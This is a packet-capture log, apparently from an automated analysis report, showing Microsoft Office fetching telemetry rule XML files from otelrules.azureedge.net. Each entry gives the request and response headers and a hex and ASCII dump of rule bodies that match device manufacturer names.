                                                                                                                                                                                            2024-11-20 20:05:12 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:12 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                            ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                                            x-ms-request-id: 657669b3-a01e-0002-118c-3a5074000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200512Z-1777c6cb7544nvmshC1TEBf7qc00000009xg000000008vgr
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:13 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            45192.168.2.44984013.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:14 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:14 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:14 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 494
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                            ETag: "0x8DC582BB8972972"
                                                                                                                                                                                            x-ms-request-id: 65766a7e-a01e-0002-4f8c-3a5074000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200514Z-1777c6cb754j8gqphC1TEB5bf80000000a0000000000bvkn
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:14 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            46192.168.2.44984113.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:14 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:14 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:14 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 420
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                            ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                                            x-ms-request-id: 65766a9d-a01e-0002-6d8c-3a5074000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200514Z-185f5d8b95csd4bwhC1NYCq7dc0000000ah0000000016290
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:14 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            47192.168.2.44984213.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:14 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:15 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:15 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                            ETag: "0x8DC582B9D43097E"
                                                                                                                                                                                            x-ms-request-id: fdab78a3-101e-005a-1d8c-3a882b000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200515Z-1777c6cb754rz2pghC1TEBghen0000000a0000000000a6wc
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:15 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            48192.168.2.44984313.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:14 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:15 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:15 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 427
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                                            ETag: "0x8DC582BA909FA21"
                                                                                                                                                                                            x-ms-request-id: 79192ebf-401e-0035-7e68-3b82d8000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200515Z-178bfbc474bbbqrhhC1NYCvw7400000000f000000000kb73
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:15 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            49192.168.2.44984413.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:14 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:15 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:15 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 486
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                                            ETag: "0x8DC582B92FCB436"
                                                                                                                                                                                            x-ms-request-id: ac667451-e01e-003c-3e8c-3ac70b000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200515Z-1777c6cb7542p5p4hC1TEBq0980000000a30000000009f4v
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:15 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            50192.168.2.44984513.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:16 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:17 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:17 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 423
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                                            ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                                            x-ms-request-id: f14fa7ac-201e-000c-4a8c-3a79c4000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200517Z-1777c6cb754xjpthhC1TEBexs800000009wg00000000ftg6
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:17 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            51192.168.2.44984613.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:16 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:17 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:17 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 478
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                                            ETag: "0x8DC582B9B233827"
                                                                                                                                                                                            x-ms-request-id: 70a27ff5-201e-0051-4e8c-3a7340000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200517Z-r1d97b99577jlrkbhC1TEBq8d000000009ag000000000c8a
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:17 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            52192.168.2.44984713.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:17 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:17 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:17 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 404
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                            ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                                            x-ms-request-id: feb02638-401e-0067-7b8c-3a09c2000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200517Z-r1d97b9957747b9jhC1TEBgyec00000009g0000000006pqz
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:17 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            53192.168.2.44984813.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:17 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:17 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:17 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                                            ETag: "0x8DC582BB046B576"
                                                                                                                                                                                            x-ms-request-id: e83eb970-001e-0046-777e-3ada4b000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200517Z-r1d97b99577mrt4rhC1TEBftkc000000096000000000gc4v
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
